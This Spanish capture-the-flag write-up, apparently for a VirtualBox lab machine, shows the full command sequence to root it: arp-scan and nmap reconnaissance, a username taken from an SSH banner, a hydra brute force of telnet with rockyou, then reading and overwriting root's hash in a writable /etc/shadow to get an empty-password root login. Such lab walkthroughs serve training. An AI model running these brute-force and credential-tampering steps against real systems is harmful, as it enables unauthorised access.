Identificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.42.113.231Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.42.113.231
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-10-25 13:39 -0300
Nmap scan report for 10.42.113.231
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
MAC Address: 08:00:27:11:B1:F6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.33 seconds❯ nmap -sCV -p 22,23,80 -oN 02-targeted.txt 10.42.113.231
Starting Nmap 7.98 ( https://nmap.org ) at 2025-10-25 13:39 -0300
Nmap scan report for 10.42.113.231
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
23/tcp open telnet Netkit telnet-ssl telnetd
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.13 secondsUna conexión por SSH muestra un banner que revela el nombre de usuario del sistema:
❯ ssh root@10.42.113.231
###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################
root@10.42.113.231: Permission denied (publickey).Con el usuario b.taylor, hacemos fuerza bruta contra el servicio telnet:
❯ hydra -l 'b.taylor' -P ~/Documents/wordlists/rockyou.txt 10.42.113.231 telnet -t 64
...
[23][telnet] host: 10.42.113.231 login: b.taylor password: rockyou
...Nos conectamos por telnet y obtenemos la primera flag:
❯ telnet 10.42.113.231
Trying 10.42.113.231...
Connected to 10.42.113.231.
Escape character is '^]'.
lower2 login: b.taylor
Password: rockyou
Last login: Sat Oct 25 19:18:17 CEST 2025 from 10.42.113.35 on pts/2
b.taylor@lower2:~$Para escalar privilegios, revisamos los grupos del usuario y vemos que pertenece al grupo shadow:
b.taylor@lower2:~$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)El grupo shadow otorga acceso a /etc/shadow, que además resulta escribible (Writable Critical Files Privesc). Leemos el hash de root:
b.taylor@lower2:~$ ls -l /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16 2025 /etc/shadow
b.taylor@lower2:~$ cat /etc/shadow | grep root
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::Generamos un hash de contraseña vacía con openssl y sustituimos el de root:
❯ openssl passwd -1
Password:
Verifying - Password:
$1$3rtnhbQf$d6bF.2.8NcXKURXi.E8fg/Editamos /etc/shadow con nano y nos autenticamos como root con contraseña vacía:
b.taylor@lower2:~$ cat /etc/shadow | grep root
root:$1$3rtnhbQf$d6bF.2.8NcXKURXi.E8fg/:20134:0:99999:7:::
b.taylor@lower2:~$ su root
Contraseña:
root@lower2:/home/b.taylor#Obtenemos la flag y fin.